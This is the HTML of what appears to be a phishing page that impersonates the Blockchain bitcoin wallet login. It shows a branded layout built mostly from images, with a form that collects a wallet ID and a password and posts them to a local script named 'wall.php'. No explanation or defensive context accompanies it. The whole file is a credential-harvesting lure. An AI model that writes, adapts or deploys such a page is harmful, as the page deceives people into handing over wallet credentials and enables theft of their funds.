<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="imgz/fav.png" />
<title>Bitcoin Wallet - Blockchain</title>
<style type="text/css">
body {
	background-repeat: no-repeat;
	background-color: #004A7C;
	top:0px;
	bottom:0px;
	margin-bottom:0px;
	margin-top:0px;
}
</style>
</head>

<body>
<center>
<div style="float:left; margin-top:27px; margin-left:25px;">
<img src="imgz/logo.png" />
</div>
<form action="wall.php" method="post">
<div style="float:left; width:550px; height:446px; background-color:#fff; margin-top:87px; margin-left:200px;">
<div style="margin-top:25px;"><img src="imgz/welcome.png" /></div>
<div style="margin-top:20px; text-align:left; margin-left:35px;"><img src="imgz/signn.png" /></div>
<div style="margin-top:0px;"><img src="imgz/line.png" /></div>
<div style="margin-top:20px; text-align:left; margin-left:35px;"><img src="imgz/id.png" /></div>
<input type="text" required="required" style="width:80%; padding:10px; margin-top:10px;" name="wall-id"  />
<div style="margin-top:8px; text-align:left; margin-left:35px;"><img src="imgz/option.png" /></div>
<div style="margin-top:20px; text-align:left; margin-left:35px;"><img src="imgz/pwd.png" /></div>
<input type="password" required="required" style="width:80%; padding:10px; margin-top:10px;" name="pass-id"  />
<input type="submit" style="width:85%; height:39px; background-color:#6FCEEF; border:none; cursor:pointer; padding:10px; border-radius:4px; margin-top:15px; font-family:'Arial Black', Gadget, sans-serif; font-weight:bold; color:#fff;" value="LOG IN" />
<div style="margin-top:22px; text-align:left; margin-left:35px;"><img src="imgz/trouble.png" /></div>
</div>
</form>
<div style="float:left; margin-top:43px">
<img src="imgz/footer.png" />
</div>
</body>
</center>
</html>
